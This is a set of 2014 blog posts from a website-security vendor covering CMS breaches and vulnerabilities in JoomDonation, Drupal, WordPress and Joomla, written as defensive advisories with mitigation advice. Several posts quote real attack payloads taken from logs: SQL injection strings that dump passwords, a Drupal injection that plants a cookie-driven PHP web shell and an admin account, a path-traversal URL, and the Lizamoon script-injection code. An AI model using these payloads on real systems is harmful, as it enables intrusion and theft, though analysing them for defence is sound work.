Daniel B. Cid

About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid

JoomDonation Compromised

We are receiving reports from many users of the popular JoomDonation platform that they received a very scary email from someone that supposedly hacked into JoomDonation. The emails went to the registered accounts and contained the full names, so it looks like JoomDonation did in fact get breached.

This is the full email:

How the hell are you? No need to ask, I’m fine!

I’m the one who has hacked all of your sites, emails, accounts etc. that has been using JoomDonation.com site/components. Scaring? Hell Yea :-)

About 15 months ago, I was able to penetrate into several Joomla sites. One of these luckies was JoomDonation.com After a while I realised that their crappy components were used by other Joomla developers too so I injected my shells into JoomDonation.com components. As per result, I’ve a list of 300000+ Joomla users+emails and you’re just one of them, lucky thing :-)

..

Yea Yea I know you all have scanners, firewalls, admin tools etc installed on your server/site but you what? F*ck em all. They’re just noob tools. Think about, I’ve injected my own shells into 10000+ Joomla sites and none of you or your magic tools have been awared of.

WARNING: You have 5 days to clean up your sites then my bot will start putting your sites down. If your site was not so valuable for me, removing the components would be enough. If so, then I will most probably blackmail you soon :-)

Want an advice from a hacker? Don’t use any script from Thailand/Vietnam developers, their code is so crappy :-) Try Indian quality.

This email was sent to all JoomDonation.com users. We’ll meet again if you have accounts registered to other Joomla developers :-)

Our research team is trying to confirm if any of the downloads from JoomDonation contain a backdoor, and we will post more details soon on what we find.

The JoomDonation developer has confirmed their environment has been compromised, but believes the issues to be specific to their server:

Hi All

I believe this is not security issues in our components/extensions. Someone hacked our server (we are using bluehost VPS server for hosting our website) somehow and uses the email systems to send this spam emails to all of you.

They want to destroy our business (and they mentioned India somehow in the email). Just the quick update from us, we will provide more information when we found something!

We are really sorry for this trouble.

The concern here is two fold:

  1. How did the attackers penetrate JoomDonation? If they leveraged a Zero-Day, then it’s likely the attacker can in fact penetrate other environments configured the same way.
  2. How is the attacker contacting JoomDonation users? This leads you to believe that there has been some level of data breach and user PII information has been compromised.

Currently, the attacker appears to be contacting those that have purchased any of the JoomDonation extensions, which include:

  1. Events Booking
  2. OS Property
  3. EShop
  4. Membership Pro
  5. EDocman
  6. CSV Advanced
  7. OS Services Booking
  8. Joom Donation
  9. Documents Seller

In the meantime, we highly recommend disabling this extension from your website. I would also highly recommend putting it behind a Website Firewall (WAF) with all hardening options enabled to minimize the chances of a compromise in case the extension has a 0-day vulnerability or backdoor.

:::::Update: 20141126 :::::

Tuan provides more details on the compromise, he states:

Dear all,

As you know, today, our hosting account was hacked. The hacker got a small part of our users information (only name and email) and emailed to these users that their sites were hacked. Infact, these sites are not hacked at all.
We have been working hard on this issue. Here are something we found and would like to inform you about them:

1. The security issue is not related to our extensions at all. So all the sites which are using our extensions at the moment will still be safe.

2. The issue came from a security hole in the hosting server which we have used. We have been using a VPS server to secure customers data, unfortunately, there was still security hole and the server has no Firewall software, so the hacker could get into the system and stole these information. We are working to move our website to a more secure server with a better hosting provider. However, it will take us one or two days for doing that.

3. The hacker just got a small part of our users information (contain name, email) and publish some of them. Few hours after the information was published (just name and a part of the email – the domain of the email is hidden), it was deleted and could not be viewable from public. So the information would be secure from now as well

4. We can assure that your sites are still safe. However, we advice that you change super admin account (and FTP account) of your site.

5. We will continue analyzing the server logs and will inform more information about this issue ASAP.

We are really sorry about this issue and hope you will stay with us and do more business with us in the future. Our extensions are good and secure, it is just the hosting server insecure and causes us all these trouble.

Sincerely, JoomDonation

Protecting Against Unknown Software Vulnerabilities

Bugs exist in every piece of code. It is suggested that for every 1,000 lines of code, there are on average 1 to 5 bugs to be found.

Some of these bugs can have security implications. These are known as vulnerabilities, and they can be used to exploit and compromise your server, your site and your users.

As long as there are people involved in the process of writing code and setting up systems, mistakes will happen as it is part of human nature. As such, security problems will always be something we have to deal with.

Impact of Vulnerabilities on Websites

Why does it matter that much? Last week, both WordPress and Drupal released new versions of their Content Management System (CMS) to patch important security vulnerabilities. Other popular WordPress plugins also released updates to fix their vulnerabilities.

Once a vulnerability is found and a patch is available, the solution is simple: Apply the patch (by doing an update) and you are now protected. It is the endless cycle that is known as software development. A bug will be found, a patch will be available, the patch is applied, another bug is found, a new patch is available, the patch is applied. Every time a new feature is introduced, new bugs are also introduced with it.

It seems like a simple process for a webmaster that as long as he is updated, he is safe.

However…

How do you protect against unknown software vulnerabilities?

What if you do not know about a specific vulnerability, how do you patch and protect your website?

What if an update goes out over a long weekend? A 0-day gets disclosed before an update is available? Or what if a vulnerability is discovered by the bad guys and they start using it without telling anyone?

  • The latest SQL injection vulnerability in the Drupal platform was being exploited within 7 hours of it’s disclosure.
  • Websites were being compromised via TimThumb before the public knew about it and a patch was available
  • We have hits in our logs from days before the latest XSS vulnerability in WordPress was disclosed.

So the question is, how do you increase your security so that you can minimize the risk and the chances of being compromised when (not if) someone tries to attack your site misusing an unpatched / unknown vulnerability?

You have options:

  1. Restrict who can access parts of your site to minimize the attack footprint.
  2. Employ prevention solutions that try to block exploit behaviors (generally called WAF’s or IPS’s).
  3. Harden parts of your stack to minimize the effect of an exploit.
  4. Constant network and log monitoring to identify Indicators of Compromise (IoC).

These are just some examples. They may sound hard or too advanced, but they are actually doable and every website owner should look into it.

Think about your desktop / notebook computer for a second. Why does every (or almost every) desktop have a personal firewall, an anti-virus, a spam filter and other similar tools? Yes, even Macs have them as well.

Why do most networks (including home networks) run behind a router with basic / advanced firewalls working to filter and prevent attacks from the Intranet?

The reason is simple: minimize the footprint and options for an attacker.

Now think about your website[s]. Let’s look at a few examples into how that can be applied to your Website security:

WordPress 4.0 Long Password DOS

Both Drupal and WordPress had a vulnerability disclosed last week that allowed an attacker to DoS (Denial of Service) a site by sending many, very long passwords in the login requests.

Prevention: Access Restriction / Reduced Footprint.
Block wp-login and wp-admin access only to authorized IP addresses. If an attacker can’t reach your login page, he won’t be able to exploit this vulnerability.

Simple solution that anyone can do by adding an .htaccess to your wp-admin allowing just a few IPs. We find this feature important enough that we employ it to our stack by default and set it as default for all users of our Website Firewall product.

Paid Memberships Pro Path Traversal

Paid Memberships Pro is a popular WordPress plugin that had a path transversal (arbitrary file download) vulnerability disclosed last week. The exploit is possible by accessing: wp-admin/admin-ajax.php and passing a file to be downloaded via getfile:

wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php

Prevention: Access restriction / reduced footprint.
The same as before, restrict access to only whitelisted IPs.

Prevention 2: WAF/IPS.
Even if the previous restriction was bypassed, an Intrusion Prevention System (IPS) or Web Application Firewall (WAF) would prevent it from being exploited through generic Local File Inclusion / Remote File Inclusion (LFI/RFI) rules.

WordPress 3.9.x stored XSS

WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported and patched last week as well.

This vulnerability abuses the core commenting system, an attacker is able to craft a simple comment to send a malicious payload that when viewed by the administrator, allows the attacker to take over the site. This explains it’s severity.

Prevention: Reduced footprint.
First, if your site does not need or use comments, why leave it open? You can block any access to wp-comments-post via .htaccess and be covered right away. If you do need comments, you can use external commenting systems that keep untrusted (user data) away from your trusted data (posts, pages, etc).

Prevention 2: Prevention technology.
Even if you do allow comments, employing a WAF or IPS would probably have blocked this XSS via generic XSS signatures that most good prevention products have.

WP-Statistics XSS

Our research team found a stored XSS in the very popular wp-statistics plugin.

Prevention: WAF/IPS.
This is where having a good WAF / IPS solution in place becomes a must. A WAF have (or should have) a XSS detection that will block this attack generically, without even knowing about this specific vulnerability. On our own WAF, we were blocking it automatically before even knowing about this bug, in a way that we did not even need to write a virtual patching for it.

Staying ahead of Unknowns

Last weeks releases are growing in number each month, as they do the importance of being able to tackle the problem of unknowns grows. Following some of the steps above would improve your over Security posture allowing you to better recognize and respond to these issues, reducing your overall risk footprint.

We offer a product that can do this all, but many of the recommendations you can employ on your own by leveraging open technologies and .htaccess changes:

  • Restrict access to wp-admin/wp-login (and any other access point) only to authorized IPs.
  • Limit footprint. Do you need comments? Do you use XMLRPC? Blocking everything and only allowing what you really need.
  • Leverage a WAF / IPS and you can do this with products like Modsecurity and OSSEC.

We’ve obviously built a technology that automates all these things for you, allowing you to get back to running your business, but you can see there are various options available to you. If you’re interested in a free trial, ping us at info@sucuri.net.

Drupal Warns – Every Drupal 7 Website was Compromised Unless Patched

The Drupal team released an update to a critical SQL Injection vulnerability a few weeks ago and urged all their users to update or patch their sites as immediately.

Today the the Drupal team released a strong statement via a public service announcement:

You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.

In case you’re wondering, this is a very strong statement for any origanization, especially an open source project, to make. It’s one we agree with and tried to amplify, without causing alarm in the initial post. Less than 48 hours after their disclosure, we released a post saying that attacks were already in the wild and attempting to compromise every site they could.

The scariest part of this vulnerability is that since Drupal uses PDO, this vulnerability is not only limited to SELECT statements, an attacker is able to able to insert or modify arbitrary data in the database.

Severity, coupled with it’s simplicity is a recipe for disaster. It’s a matter of time before it’s integrated into the latest toolsets and attacks are actively detected.

The first attack started 8 hours after the disclosure. The attackers began hitting our honeypots with the following SQL Injection attempt…

One thing I want to make very clear is that every site behind our website firewall is and has been protected against this attack. We still recommended all our users patch, but our virtual patching (along with our SQL injection protection), kept and will continue to keep our clients sites safe.

Recovery Mode

If you have not patched your site in time and you were not using a Website Firewall with virtual patching enabled, you should assume that your site was indeed hacked. You need to defer to your incident response procedures and assume a compromise has occurred until you can prove otherwise.

The Drupal team provided some steps in their disclosure, but we also want to recommend the following steps:

  1. Check if your site is actively serving malware or spam. Free scanners like SiteCheck and Unmaskparasites exist for this purpose.
  2. Download a filesystem backup from before Oct 15th and compare all file changes since.
  3. Download a database backup from before Oct 15th and compare any changes there. Look for new users and new hooks specially. If you can, restore to that backup to be safe.
  4. Change all passwords.
  5. Look up for any new file added since.

The scary part of this issue is that Drupal, unlike many other of it’s counterparts – Joomla! and WordPress – is heavily employed in larger organizations (enterprises for lack of a better word). This means that it’s highly unlikely that they were able to patch. Unlike consumers and small business, large organizations have processes that dictate the steps that they are allowed to take and what points. Each step has a series of approvals and depending on the size of the organization those approvals can be exhaustive (meaning they can take time).

This is a recipe for disaster, if it’s true and those websites are in fact compromised, they could be leveraged and daisy chained for a massive malware distribution campaign. Take that into consideration with the size and audience of brands and the impact grows exponentially.

If you are one such organization that finds yourself in this type of situation, we highly recommend employing technology solutions that give you more time to follow your steps while still protecting your online property.

Google Blacklists Bit.ly

If you ever shortened a URL using bit.ly or if you use it anywhere, be aware that Google recently blacklisted all bit.ly pages through its Safe Browsing program. It means that anyone using Chrome, Firefox or Safari will get a nasty The site ahead contains malware warning when visiting a bit.ly link:

Screen Shot 2014-10-25 at 10.23.45 AM

Why would Google blacklist bit.ly?

Google has many automated processes to detect if a specific domain is hosting malware, redirecting to malware or somehow being misused to compromise other sites (as an intermediary). It flags thousands of sites every day and it seems that the bit.ly had some redirections that were flagged by their detection process.

This is what their diagnostics page say:

What is the current listing status for bit.ly? Site is listed as suspicious – visiting this web site may harm your computer.

Of the 91549 pages we tested on the site over the past 90 days, 721 page(s) resulted in malicious software being downloaded and installed without user consent.

That generally means that someone shortened a URL that was redirecting to a browser exploit kit that was pushing malware to the visitors visiting this page.

Shortened URL malware

Unfortunately, Google is not completely wrong with this one (but likely a bit excessive, time will tell). We constantly see malware injection on websites leveraging shortened URL links. Here is an example of what we mean, this payload was found in a compromised website:

<iframe src="http://bit.ly/1qJGlE0"nbsp;
name="iframe_name" scrolling="no" frameborder="0" allowfullscreen align="top" height="400px" width="720px">

This iframe injection has a bit.ly link that redirects to a drive-by-download hosted at httx://teamliboza[.]nl/streamplayer1.php. It happens often with bit.ly and other URL shortens. This new blacklisting status could be a change in tide for URL shorteners as Google takes a hard stance against how attackers employ them to distribute malware. That or they could be legitimately blocked, it’s just hard to say at the moment.

Whether they are actually hacked or being tagged for what others are doing will require more time and analysis as it’s a very unique situation. For now however, if you depend on the shortening service, if you want people to see your content it’s best to avoid the service until the issue has been resolved.

Additionally, if you leverage the shortener in your own website this could be impactful to you as your website could get inadvertently blacklisted for loading a blacklisted website. Something to be mindful of. The good news is that the blacklist will be for the shortener, so removing it will address the problem, but the bad news is that most end-users won’t read the details and assume it’s you.

We will keep monitoring this issue closely and we will post an update as soon as we hear more. In the mean time, do not visit bit.ly links and replace them with their real final destination URL.

Update 1: After almost 12 hours, Google removed the ban from Bit.ly. They also changed the diagnostics page to:

What is the current listing status for bit.ly?
This site is not currently listed as suspicious.

Drupal SQL Injection Attempts in the Wild

Update (2014/10/29): The Drupal team just released a Public Service Announcement, confirming what we are seeing (mass compromise of Drupal sites). We’ve released a new post with recovery information if you did not update in time.

This quote directly from the Drupal team sums it all up:

You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.

Original Post:
Less than 48 hours ago, the Drupal team released an update (version 7.32) for a serious security vulnerability (SQL injection) that affected all versions of Drupal 7.x.

Our last post shared some thoughts on the issue, specifically concerns around how simple a vulnerability it was to exploit and how time was the only delay in seeing wide spread attacks. Being that Drupal is one of the most popular platforms dominating the CMS space today (along with WordPress and Joomla), it only makes sense, that attackers will try to leverage it.

When the a simple vulnerability is introduced that has massive impact, it’s unfortunately a recipe for disaster.

Attacks in the Wild

The first attack started 8 hours after the disclosure. The attackers began hitting our honeypots with the following SQL Injection attempt. The same IP also tried to attack our own site.

Sample attack:

POST /?q=node&destination=node HTTP/1.1" 403 4123 "sucuri.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" 
Payload:
name [0%20and%20extractvalue(1, concat(0x5c, (select md5(1122) from 
information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed&
removed=removed&form_build_id=&form_id=user_login_block&op=Log+in

This initial attempt wasn’t that malicious, seems more like it was a test to see if we were vulnerable (or maybe testing their tools). Decoding the SQLi attack, you find they are doing a SELECT md5() from the information_schema.tables.

A few hours later the real attacks began, attempting to mass compromise Drupal-based websites. The more common attack tries to inject a backdoor into Drupal’s menu_router with the following query:

name=\x22name[0; INSERT INTO `menu_router` (`path`, `load_functions`, 
`to_arg_functions`, `description`, `access_callback`, `access_arguments`) VALUES ('removed', 
'', '', 'removed', 'file_put_contents', 0x613a323a7b693a303b733a32343a226d6f64756c657f6.....6870696e666f28293b223b7d);;#  ]

It runs the INSERT query into the menu_router, passing a call to file_put_contents to insert the following file:

a:2:{i:0;s:24:"modules/trigger/XXX-removed.php";i:1;s:14:"<?php $form1=@$_COOKIE["removed"]; 
if ($form1){ $opt=$form1(@$_COOKIE["removed"]); $au=$form1(@$_COOKIE["removed"]); 
$opt("/16/e",$au,16); } phpinfo();";}

Once inserted it provides the attacker full shell access to the hacked site (all commands passing via cookies). That has our team very worried that we might see a massive compromise of Drupal sites that have not updated yet.

Other attacks include attempts to list all users passwords:

name[0%20and%20extractvalue(1, concat(0x5c, (select
+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test

Some attempts to inject content into menu_router:

form_id=user_login&name[a;%0aTRUNCATE+TABLE+cache_bootstrap
%3BUPDATE+menu_router+SET+access_arguments%3D0x613a313a7b733a348355...
access_callback%3D0x7068705f6576616c+WHERE+path%3D0x75736572%3B
UPDATE+system+SET+status+%3D+1+WHERE+name+%3D+0x706870%3BINSERT+
INTO+registry_file+%28filename%2Chash%29+VALUES+%280x6d6f64756c6..
3964333763396331616263%29%3B%23]=yo&name[a]=heh&op=Log+in&pass=bb

Some attempts to inject a new admin user:

name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'%24S%24CTo9G7L...3a3g'+
where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&
form_id=user_login_block&op=Log+in"

All attempts sharing a similar trait, they are very serious attacks. The bad news is that we are seeing many Drupal sites still not updated against this vulnerability. As we said before, sites behind our Website Firewall are protected against this issue, so if you are concerned about exploits, you can give it a try.

We are actively monitoring the issue and we will keep pushing updates as we learn more.

Highly Critical SQL Injection Vulnerability Patched in Drupal Core

The Drupal team just released a security update for Drupal 7.x to address a highly critical SQL injection vulnerability. This bug can be exploited remotely by non-authenticated users and was classified as “Highly Critical” by the Drupal Security team. More information is available in their public advisory:

Posted by Drupal Security Team on October 15, 2014 at 4:02pm
Advisory ID: DRUPAL-SA-CORE-2014-005
Version: 7.x
Date: 2014-Oct-15
Security risk: 20/25 ( Highly Critical) AC:Basic/A:None/CI:All/II:All/E:Theoretical/TD:All
Vulnerability: SQL Injection


Read More

WordPress Websites Continue to Get Hacked via MailPoet Plugin Vulnerability

The popular Mailpoet(wysija-newsletters) WordPress plugin had a serious file upload vulnerability a few months back, allowing an attacker to upload files to vulnerable sites.

This issue was disclosed months ago and the MailPoet team patched it promptly. It seems, though, that many website owners have still not gotten the word, or are blatantly not updating, because we are seeing another string of mass exploitation attempts against WordPress websites. Those that are not or have not updated are getting infected repeatedly via this vector. The issue is compounded further because the attackers are using it as a spring board into the rest of their account further compromising their entire account.

Please, we cannot stress the importance of updating enough, and not just your active website, but any other websites you have in your stack, under the same account. Cross-site contamination is a very serious issue. If you can’t update for whatever reason, employ the use of a Website Firewall, at a minimum, and stop the attackers before they get in.

The Payload

We are lucky because the volume of infected websites we see daily allows us to analyze and clean hundreds of websites which then allows us to establish processes that escalate cases if they trigger specific similarities. It’s part of our pattern recognition process. It’s at this point that our Research team gets involved to better understand the cause and introduce new solutions to 1) clean it faster and 2) see if there is something we can do to get ahead of it (it’s what leads to these posts).


Read More

Website Attacks – SQL Injection And The Threat They Present

We are starting a new series of articles where we will talk about different active website attacks we are seeing.

The first one we will cover is known as a SQL Injection (SQLi). Some might know what a SQL Injection (SQLi) attack looks like, but assuming you don’t, it’s an attack that leverages an injection technique to manipulate and / or further exploit your SQL based database. It does this by passing queries and commands to your database, often via input forms on your website. The Open Web Application Security Project (OWASP) defines an SQLi attack as:

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. – OWASP

An example of what an attack may look like can be seen in the following query:

SELECT subject from posts WHERE subject LIKE '%$subject%';

If the $subject variable can be manipulated by a bad actor. Manipulation can include modification of data, display or listing of data and possibly even insertion of new data. In some special cases, it can also be used to execute shell commands and / or dump passwords (tip: MySQL Load_file function). To give a extreme example, this is the screenshot from one or our researchers doing a penetration test against a vulnerable application:

Sucuri - SQL Injection Example - Load File Abuse

Sucuri – SQL Injection Example – Load File Abuse

Our researcher was able to use load_file() to dump the password list from the server.

What we’ve provided here is a very watered down summary of what SQLi is and what it’s important to you, if you are a developer or enduser we recommend you invest more time understand this attack vector and its implications to your website. A good resource is the OWASP – Testing for SQL Injection page.

SQL Injection Attacks

We are currently seeing more than 50,000 attacks per day that fall into our SQL Injection categorization. Most of them are automated and try to compromise well known vulnerabilities in common CMS’s and web projects (Joomla, WordPress, vBulletin, etc).

This is the attack fluctuation for SQLi attacks, month over month:

Sucuri - Month over Month Distribution of SQLi Attacks

Sucuri – Month over Month Distribution of SQLi Attacks

The number of attacks we are detecting is growing each month, this is to be expected though as our Website Firewall product continues to grow. Overall though, the number of SQL injection attempts continue to grow.

If we drill down into our data and hook it up to a geo locator we can also see that the attacks come from everywhere. Most people tend to think that Russia, Brazil, Romania and a few other countries are the “bad” sources, but for SQL injection, the top attackers come from the USA, India, Indonesia and China:

sql-injection-map

So unless you only service one specific country and don’t care about the rest of the world, Geo blocking is not a good protection against automated SQL injections. What we found interesting is that most bots still like to fake themselves as either Google, MSIE 6 or set no user agent at all:

16%- MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
13%- Googlebot/2.1; +http://www.google.com/bot.html)
11%- No user agent

Just by blocking these anomalous requests, you can get ride of 1/3 of all automated injection attempts.

Attack Types

The attacks really vary from each other, but we feel most can be classified into two categories:

1- Data Exfiltration

Data exfiltration via SQL Injection is what has contributed to some of the largest data breaches to date. The attackers find a vulnerability
that allows them to list all tables and dump all user accounts, emails and passwords.

Here is an example of what we consider data exfiltration, this is an active attack via our network:

/NewsType.asp?SmallClass='%20
union%20select%200,username%2BCHR(124)
%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin
%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

You can see the smallclass variable was not being properly filtered, instead of accepting the Class ID, it allowed the attackers to run a query to the database to list all username and passwords from the admin table.

Had the user not been leveraging a Website Firewall, the attacker would have had his information compromised. This is a very good example of this classification, it demonstrates well what the attack looks like.

This is another example:

/index.php?view=article&id=422:undef&catid=170:2014-service-providers&Itemid=713&option=com_content'%20%20and(select%201%20from(select%20count(*),
concat((select%20(select%20(select%20concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,
0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72)%20from%20%60information_schema%60.tables%20limit%200,1))
%20from%20%60information_schema%60.tables%20limit%200,1),floor(rand(0)*2))x%20
from%20%60information_schema%60.tables%20group%20by%20x)a)%20and%207=7%20%20and%20''='

This code is a bit more complex, it tries to do the same form of exfiltration.

Another one we are seeing very often is against Joomla’s com_kunena module, attempting to exploit the latest disclosed vulnerability:

/index.php?option=com_kunena&func=
userlist&search=%25'/**//*!aNd*//**/1=2)/**//*!uNioN*//**//*!SeLecT*//**/1,/*!
concat(0x3b3b3b,username,0x3e3e3e,password,0x7c7c7
c,usertype)*/,/*!concat(0x3b3b3b,username,0x3e3e3e,password,0x7c7c7c,usertype)
*/,4,5,6,7,8,9,10,11,12,13,14,15/**//*!fRoM*//**/j
os_users/**//*!WheRe*//**/usertype=0x53757065722041646d696e6973747261746f72/**/
/*!oR*/usertype=0x41646d696e6973747261746f72%20--
%20;

2- Code Injection

We don’t see these very often, they often rely on some initial vulnerability pre-tests that we block automatically via our Website Firewall making it that much harder to record and attempt. A good example of malicious code injection happened with the old Robint/Lizamoon type of attacks against IIS web sites.

It was running this code:

0xdEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe=’u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec(‘UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696
E742E75732F752E6A733E3C2F7363726970743E aS vArChAr(51)) where ['+@c+'] not like ”%robint%”’) fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;–

Which would force the injection of JavaScript into some vulnerable websites database tables.

Conclusion

SQL Injections are a real threat, they are being actively attacked and exploited every day. If you are a developer you should be leveraging the OWASP SQL Injection Prevention Cheat Sheet at a minimum. In it you will find recommendations categorized into two groups Primary and Additional Defenses.

Primary Defenses:

Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input

Additional Defenses:

Also Enforce: Least Privilege
Also Perform: White List Input Validation


Now my question is to you, those reading this and interested in the data, what additional information would you like to see in our reports and posts? We’re always looking for feedback and insights to improve our content and contributions.

Phishing with help from Compromised WordPress Sites

We get thousands of spam and phishing emails daily. We use good spam filters (along with Gmail) and that greatly reduces the noise in our inbox. Today though, one slipped through the crack and showed up in my personal inbox:

Gmail Phishing


Read More

Joomla! 3.3.5 Released – Fixing High Priority Security Issues

Update: It seems like there is a glitch in the new version and the Joomla team is urging its users not to upgrade yet. From their twitter:

Screen Shot 2014-09-30 at 4.04.31 PM

Original post:

The Joomla team just released versions 3.3.5, 3.2.6 and 2.5.26, patching high priority security issues. The first one is an Remote File Include (RFI) vulnerability and the second one is a Denial of Service (DoS) vulnerability that affect all previous versions. If you are using Joomla, stop what you are doing and update it now!

The good news for our clients and what’s very exciting for us, me especially, is to see how the virtual hardening on our CloudProxy Website firewall protected our clients automatically against this vulnerability. As our researchers started to analyze the disclosure, we quickly noticed that it was already covered and the URL used to trigger this bug was already blocked by default. It means that our clients got zero-day protection without anyone even knowing about this issue.

For more information on these vulnerabilities, you can get straight from the Joomla! release notes:

High Priority – Core – Remote File Inclusion:

Project: Joomla!
SubProject: CMS
Severity: Moderate
Versions: 2.5.4 through 2.5.25, 3.2.5 and earlier 3.x versions, 3.3.0 through 3.3.4
Exploit type: Remote File Inclusion
Reported Date: 2014-September-24
Fixed Date: 2014-September-30
CVE Number: CVE-2014-7228

Inadequate checking allowed the potential for remote files to be executed.

This issue was discovered by Johannes Dahse and disclosed to Akeeba (and Joomla). The Akeeba team released a good post explaining the issue. We recommend reading if you are interested in the technical details.

Medium Priority – Core – Denial of Service:

Project: Joomla!
SubProject: CMS
Severity: Low
Versions: 2.5.4 through 2.5.25, 3.2.5 and earlier 3.x versions, 3.3.0 through 3.3.4
Exploit type: Denial of Service
Reported Date: 2014-September-24
Fixed Date: 2014-September-30
CVE Number: CVE-2014-7229

Inadequate checking allowed the potential for a denial of service attack.

Again, if you are using the Joomla! we highly recommend updating immediately.